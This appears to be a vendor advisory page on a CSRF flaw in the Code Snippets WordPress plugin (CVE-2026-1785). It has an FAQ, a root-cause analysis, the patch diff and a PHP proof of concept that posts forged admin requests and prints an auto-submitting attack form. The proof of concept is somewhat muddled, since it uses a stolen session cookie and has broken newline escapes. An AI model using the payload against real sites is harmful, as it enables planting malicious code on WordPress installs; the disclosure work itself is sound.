What is CVE-2026-1785?

CVE-2026-1785 is a Cross-Site Request Forgery (CSRF) vulnerability in the Code Snippets plugin for WordPress, affecting versions up to and including 3.9.4. It allows unauthenticated attackers to trick logged-in administrators into downloading or updating cloud snippets without their consent.

How does this vulnerability work?

The vulnerability arises from missing nonce validation in the Cloud_Search_List_Table class. Attackers can create malicious web pages that submit requests to the WordPress admin interface, forcing actions like downloading or updating snippets when an administrator visits the page.

Who is affected by this vulnerability?

Any WordPress site using the Code Snippets plugin version 3.9.4 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard and update if necessary.

How can I check if I am using a vulnerable version?

To check your version, navigate to the Plugins section in your WordPress admin dashboard. Look for the Code Snippets plugin and verify the version number listed next to it.

How can I fix or mitigate the issue?

The vulnerability is patched in version 3.9.5 of the Code Snippets plugin. To mitigate the issue, update the plugin to the latest version as soon as possible to ensure nonce validation is properly implemented.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it still poses a significant risk that requires user interaction for exploitation, making it important to address.

What are the potential risks of exploitation?

If exploited, attackers can manipulate the cloud snippet repository, potentially leading to the installation of malicious code snippets or backdoors. This could result in arbitrary code execution, data theft, or complete site compromise.

How does social engineering play a role in this vulnerability?

Successful exploitation requires social engineering techniques to trick an authenticated administrator into visiting a malicious page. The attacker must craft a convincing scenario to lure the administrator into executing the malicious request.

What changes were made in the patch for version 3.9.5?

The patch for version 3.9.5 includes nonce validation for cloud snippet actions, input sanitization, and checks to ensure only valid actions and snippet IDs are processed. This significantly enhances the security of the plugin.

What is a proof of concept in this context?

The proof of concept provided demonstrates how an attacker could exploit the vulnerability by simulating a malicious request to the WordPress admin interface. It shows the specific parameters that need to be sent to execute the attack.

How can I protect my site from similar vulnerabilities in the future?

To protect against similar vulnerabilities, regularly update all plugins and themes, monitor security advisories, and implement security measures such as web application firewalls and user education on phishing attacks.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security advisories from WordPress, and detailed security analysis reports from security research organizations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1785: Code Snippets <= 3.9.4 – Cross-Site Request Forgery to Cloud Snippet Download/Update Actions (code-snippets)

CVE ID CVE-2026-1785

Plugin code-snippets

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 3.9.4

Patched Version 3.9.5

Disclosed February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1785:
The Code Snippets WordPress plugin version 3.9.4 and earlier contains a Cross-Site Request Forgery vulnerability in its cloud snippet management functionality. This vulnerability allows attackers to force authenticated administrators to download or update cloud snippets without their consent. The CVSS score of 4.3 reflects a medium severity issue requiring user interaction for exploitation.

Root Cause:
The vulnerability exists in the `Cloud_Search_List_Table` class within `/code-snippets/php/cloud/class-cloud-search-list-table.php`. The `process_cloud_actions()` method processes cloud snippet actions without validating WordPress nonce tokens. Lines 101-115 in the vulnerable version directly process `$_REQUEST[‘action’]`, `$_REQUEST[‘snippet’]`, and `$_REQUEST[‘source’]` parameters after only checking that `$_REQUEST[‘type’]` equals ‘cloud_search’. This missing nonce validation allows CSRF attacks against the cloud snippet download and update operations.

Exploitation:
Attackers can craft malicious web pages containing HTML forms or JavaScript that automatically submit requests to the WordPress admin interface. The exploit targets the plugin’s cloud search functionality with parameters: `type=cloud_search`, `action=download` or `action=update`, `snippet={cloud_snippet_id}`, and `source=search` or `source=cloud`. When a logged-in administrator visits the malicious page, the request executes with the administrator’s privileges, downloading or updating cloud snippets without consent.

Patch Analysis:
The patch in version 3.9.5 adds comprehensive security checks. The `process_cloud_actions()` method now validates all required parameters exist, sanitizes input values, restricts actions to ‘download’ or ‘update’, validates snippet IDs as positive integers, and most critically calls `check_admin_referer()` with a dynamically generated nonce action. The patch also modifies the URL generation functions in `/code-snippets/php/cloud/list-table-shared-ops.php` to include nonce tokens via `wp_nonce_url()` and adds a new helper function `cloud_lts_get_snippet_action_nonce_action()` to generate consistent nonce action strings.

Impact:
Successful exploitation allows attackers to manipulate the cloud snippet repository on affected WordPress sites. Attackers can force administrators to download malicious code snippets or update existing snippets with compromised versions. This could lead to arbitrary code execution, backdoor installation, data theft, or site compromise if administrators subsequently activate the downloaded snippets. The attack requires social engineering to trick administrators into visiting malicious pages while authenticated.

Differential between vulnerable and patched code

Code Diff

--- a/code-snippets/code-snippets.php
+++ b/code-snippets/code-snippets.php
@@ -8,11 +8,11 @@
  * License:      GPL-2.0-or-later
  * License URI:  license.txt
  * Text Domain:  code-snippets
- * Version:      3.9.4
+ * Version:      3.9.5
  * Requires PHP: 7.4
  * Requires at least: 5.0
  *
- * @version   3.9.4
+ * @version   3.9.5
  * @package   Code_Snippets
  * @author    Shea Bunge <shea@codesnippets.pro>
  * @copyright 2012-2024 Code Snippets Pro
@@ -37,7 +37,7 @@
 	 *
 	 * @const string
 	 */
-	define( 'CODE_SNIPPETS_VERSION', '3.9.4' );
+	define( 'CODE_SNIPPETS_VERSION', '3.9.5' );

 	/**
 	 * The full path to the main file of this plugin.
--- a/code-snippets/php/cloud/class-cloud-search-list-table.php
+++ b/code-snippets/php/cloud/class-cloud-search-list-table.php
@@ -101,15 +101,33 @@
 		);

 		// Check request is coming from the cloud search page.
-		if ( isset( $_REQUEST['type'] ) && 'cloud_search' === $_REQUEST['type'] ) {
-				if ( isset( $_REQUEST['action'], $_REQUEST['snippet'], $_REQUEST['source'] ) ) {
-					cloud_lts_process_download_action(
-						sanitize_key( wp_unslash( $_REQUEST['action'] ) ),
-						sanitize_key( wp_unslash( $_REQUEST['source'] ) ),
-						sanitize_key( wp_unslash( $_REQUEST['snippet'] ) ),
-					);
-				}
+		if ( ! isset( $_REQUEST['type'] ) || 'cloud_search' !== sanitize_key( wp_unslash( $_REQUEST['type'] ) ) ) {
+			return;
 		}
+
+		if ( ! isset( $_REQUEST['action'], $_REQUEST['snippet'], $_REQUEST['source'] ) ) {
+			return;
+		}
+
+		$action = sanitize_key( wp_unslash( $_REQUEST['action'] ) );
+		$source = sanitize_key( wp_unslash( $_REQUEST['source'] ) );
+		$snippet_id = absint( wp_unslash( $_REQUEST['snippet'] ) );
+
+		if ( ! in_array( $action, [ 'download', 'update' ], true ) ) {
+			return;
+		}
+
+		if ( ! $snippet_id ) {
+			return;
+		}
+
+		check_admin_referer( cloud_lts_get_snippet_action_nonce_action( $action, $snippet_id, $source ) );
+
+		cloud_lts_process_download_action(
+			$action,
+			$source,
+			(string) $snippet_id,
+		);
 	}

 	/**
--- a/code-snippets/php/cloud/list-table-shared-ops.php
+++ b/code-snippets/php/cloud/list-table-shared-ops.php
@@ -10,6 +10,19 @@
 use function Code_Snippetscode_snippets;

 /**
+ * Build the nonce action string for cloud snippet state-changing operations.
+ *
+ * @param string $action    Action - 'download' or 'update'.
+ * @param int    $snippet_id Cloud snippet ID.
+ * @param string $source    Source - 'search' or 'cloud'.
+ *
+ * @return string
+ */
+function cloud_lts_get_snippet_action_nonce_action( string $action, int $snippet_id, string $source ): string {
+	return sprintf( 'cloud-snippet-action|%s|%s|%d', $action, $source, $snippet_id );
+}
+
+/**
  * Display a hidden input field for a certain column and snippet value.
  *
  * @param string        $column_name Column name.
@@ -82,15 +95,19 @@
 	$link = code_snippets()->cloud_api->get_link_for_cloud_snippet( $cloud_snippet );
 	$is_licensed = code_snippets()->licensing->is_licensed();
 	$download = $is_licensed || ! in_array( $lang, [ 'css', 'js' ], true );
+	$snippet_id = (int) $cloud_snippet->id;

 	if ( $link ) {
 		if ( $is_licensed && $link->update_available ) {
-			$update_url = add_query_arg(
-				[
-					'action'  => 'update',
-					'snippet' => $cloud_snippet->id,
-					'source'  => $source,
-				]
+			$update_url = wp_nonce_url(
+				add_query_arg(
+					[
+						'action'  => 'update',
+						'snippet' => $snippet_id,
+						'source'  => $source,
+					]
+				),
+				cloud_lts_get_snippet_action_nonce_action( 'update', $snippet_id, $source )
 			);
 			return sprintf(
 				'<li><a class="button button-primary" href="%s">%s</a></li>',
@@ -109,7 +126,7 @@
 	if ( $download ) {
 			$download_query = [
 				'action'  => 'download',
-				'snippet' => $cloud_snippet->id,
+				'snippet' => $snippet_id,
 				'source'  => $source,
 			];

@@ -118,7 +135,10 @@
 				$download_query['cloud_page'] = (int) wp_unslash( $_REQUEST['cloud_page'] );
 			}

-			$download_url = add_query_arg( $download_query );
+			$download_url = wp_nonce_url(
+				add_query_arg( $download_query ),
+				cloud_lts_get_snippet_action_nonce_action( 'download', $snippet_id, $source )
+			);

 		$download_button = sprintf(
 			'<li><a class="button button-primary" href="%s">%s</a></li>',
--- a/code-snippets/vendor/composer/installed.php
+++ b/code-snippets/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'codesnippetspro/code-snippets',
-        'pretty_version' => 'v3.9.4',
-        'version' => '3.9.4.0',
-        'reference' => '8ee0c5cd40988c6ddfdba4d8fb67523296d84d1e',
+        'pretty_version' => 'v3.9.5',
+        'version' => '3.9.5.0',
+        'reference' => '63a360e59693c349349250023b40f2d9728b419e',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'codesnippetspro/code-snippets' => array(
-            'pretty_version' => 'v3.9.4',
-            'version' => '3.9.4.0',
-            'reference' => '8ee0c5cd40988c6ddfdba4d8fb67523296d84d1e',
+            'pretty_version' => 'v3.9.5',
+            'version' => '3.9.5.0',
+            'reference' => '63a360e59693c349349250023b40f2d9728b419e',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1785 - Code Snippets <= 3.9.4 - Cross-Site Request Forgery to Cloud Snippet Download/Update Actions

<?php
/**
 * Proof of Concept for CVE-2026-1785
 * This script demonstrates CSRF against Code Snippets plugin <= 3.9.4
 * Requires an authenticated administrator session cookie
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';
$admin_cookie = 'wordpress_logged_in_abc123=...'; // Replace with actual session cookie

// Cloud snippet ID to target (must exist in cloud repository)
$snippet_id = 123;
$action = 'download'; // Can be 'download' or 'update'
$source = 'search'; // Can be 'search' or 'cloud'

// Build the malicious request parameters
$post_data = [
    'page' => 'code-snippets',
    'type' => 'cloud_search',
    'action' => $action,
    'snippet' => $snippet_id,
    'source' => $source
];

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $admin_cookie);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the CSRF attack
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Check if attack was successful
if ($http_code === 200) {
    echo "CSRF attack executed successfully.n";
    echo "Action: $action on snippet ID: $snippet_idn";
} else {
    echo "Attack failed with HTTP code: $http_coden";
}

// HTML form version for browser-based exploitation
echo "nn<!-- HTML form for browser-based CSRF -->n";
echo "<form id='csrf-form' method='POST' action='$target_url'>n";
echo "<input type='hidden' name='page' value='code-snippets'>n";
echo "<input type='hidden' name='type' value='cloud_search'>n";
echo "<input type='hidden' name='action' value='$action'>n";
echo "<input type='hidden' name='snippet' value='$snippet_id'>n";
echo "<input type='hidden' name='source' value='$source'>n";
echo "</form>n";
echo "<script>document.getElementById('csrf-form').submit();</script>n";
?>

Frequently Asked Questions

What is CVE-2026-1785?
Understanding the vulnerability
CVE-2026-1785 is a Cross-Site Request Forgery (CSRF) vulnerability in the Code Snippets plugin for WordPress, affecting versions up to and including 3.9.4. It allows unauthenticated attackers to trick logged-in administrators into downloading or updating cloud snippets without their consent.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the Cloud_Search_List_Table class. Attackers can create malicious web pages that submit requests to the WordPress admin interface, forcing actions like downloading or updating snippets when an administrator visits the page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Code Snippets plugin version 3.9.4 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard and update if necessary.
How can I check if I am using a vulnerable version?
Verifying your plugin version
To check your version, navigate to the Plugins section in your WordPress admin dashboard. Look for the Code Snippets plugin and verify the version number listed next to it.
How can I fix or mitigate the issue?
Updating the plugin
The vulnerability is patched in version 3.9.5 of the Code Snippets plugin. To mitigate the issue, update the plugin to the latest version as soon as possible to ensure nonce validation is properly implemented.
What does a CVSS score of 4.3 mean?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it still poses a significant risk that requires user interaction for exploitation, making it important to address.
What are the potential risks of exploitation?
Consequences of an attack
If exploited, attackers can manipulate the cloud snippet repository, potentially leading to the installation of malicious code snippets or backdoors. This could result in arbitrary code execution, data theft, or complete site compromise.
How does social engineering play a role in this vulnerability?
User interaction requirement
Successful exploitation requires social engineering techniques to trick an authenticated administrator into visiting a malicious page. The attacker must craft a convincing scenario to lure the administrator into executing the malicious request.
What changes were made in the patch for version 3.9.5?
Improvements in security
The patch for version 3.9.5 includes nonce validation for cloud snippet actions, input sanitization, and checks to ensure only valid actions and snippet IDs are processed. This significantly enhances the security of the plugin.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker could exploit the vulnerability by simulating a malicious request to the WordPress admin interface. It shows the specific parameters that need to be sent to execute the attack.
How can I protect my site from similar vulnerabilities in the future?
Best practices for security
To protect against similar vulnerabilities, regularly update all plugins and themes, monitor security advisories, and implement security measures such as web application firewalls and user education on phishing attacks.
Where can I find more information about this vulnerability?
Additional resources
More information can be found in the official CVE database, security advisories from WordPress, and detailed security analysis reports from security research organizations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations